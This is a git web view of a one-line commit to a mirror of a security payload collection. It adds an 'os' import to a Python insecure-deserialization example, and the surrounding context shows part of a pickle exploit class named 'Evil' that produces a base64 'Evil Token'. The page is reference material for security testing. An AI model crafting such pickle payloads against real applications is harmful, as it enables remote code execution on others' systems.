ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

import os

Browse Source
This commit is contained in:
nerrorsec 2022-03-24 11:54:34 +05:45 committed by GitHub
parent d40e055629
commit df8493e4e6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Insecure Deserialization/Python.md
View File

@ -32,7 +32,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python ```python
import cPickle import cPickle, os
from base64 import b64encode, b64decode from base64 import b64encode, b64decode
class Evil(object): class Evil(object):
@ -47,4 +47,4 @@ print("Your Evil Token : {}").format(evil_token)
## References ## References
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)